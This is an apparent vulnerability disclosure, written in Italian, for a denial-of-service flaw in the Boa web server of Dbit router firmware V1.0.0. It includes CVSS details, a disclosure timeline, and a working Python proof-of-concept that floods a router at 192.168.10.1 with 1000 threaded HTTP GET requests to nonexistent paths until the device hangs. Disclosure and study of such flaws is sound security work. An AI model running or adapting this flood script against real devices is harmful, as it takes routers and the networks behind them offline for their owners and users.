
Proof-of-concept per CVE-2026-36957, una vulnerabilità denial-of-service nel firmware del router Dbit tramite flood HTTP sul web server Boa, che causa esaurimento delle risorse e blocco del sistema.
ID CVE: CVE-2026-36957 Data: 2026-04-29 Scopritore: Kirubel Solomne Vendor: Shenzhen Dibit Network Equipment Co., Ltd. Prodotto: Dbit Router Versione Firmware: V1.0.0 CWE: CWE-400 - Consumo incontrollato di risorse
Il firmware V1.0.0 del router Dbit è vulnerabile a Denial of Service tramite il gestore URI del server web Boa. Inviando un flood ad alto volume di richieste HTTP GET verso URI inesistenti, un attaccante può esaurire risorse critiche di sistema, inclusi i file descriptor e i buffer di memoria. Ciò provoca un deadlock del kernel o un blocco del sistema che disabilita il portale di gestione web e tutte le funzionalità di routing.
Punteggio CVSS v3.1: 7.5 (Alto)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
| Metrica | Valore |
|---|---|
| Vettore di attacco | Rete |
| Complessità dell'attacco | Bassa |
| Privilegi richiesti | Nessuno |
| Interazione utente | Nessuna |
| Impatto sulla riservatezza | Nessuno |
| Impatto sull'integrità | Nessuno |
| Impatto sulla disponibilità | Alto |
import requests
import threading
TARGET = "http://192.168.10.1"
def flood(i):
try:
requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
except:
pass
threads = []
for i in range(1000):
t = threading.Thread(target=flood, args=(i,))
threads.append(t)
t.start()
for t in threads:
t.join()
print("Done. Check if router is still responsive.")
Comportamento atteso: Il server dovrebbe limitare le connessioni e rimanere stabile. Comportamento effettivo: L'interfaccia web del router diventa non responsiva; richiede un riavvio manuale.
| Data | Evento |
|---|---|
| 2026-04-29 | Vulnerabilità scoperta |
| 2026-04-29 | Segnalata a MITRE |
| 2026-04-29 | Assegnato CVE-2026-36957 |
| 2026-04-29 | Divulgazione pubblica |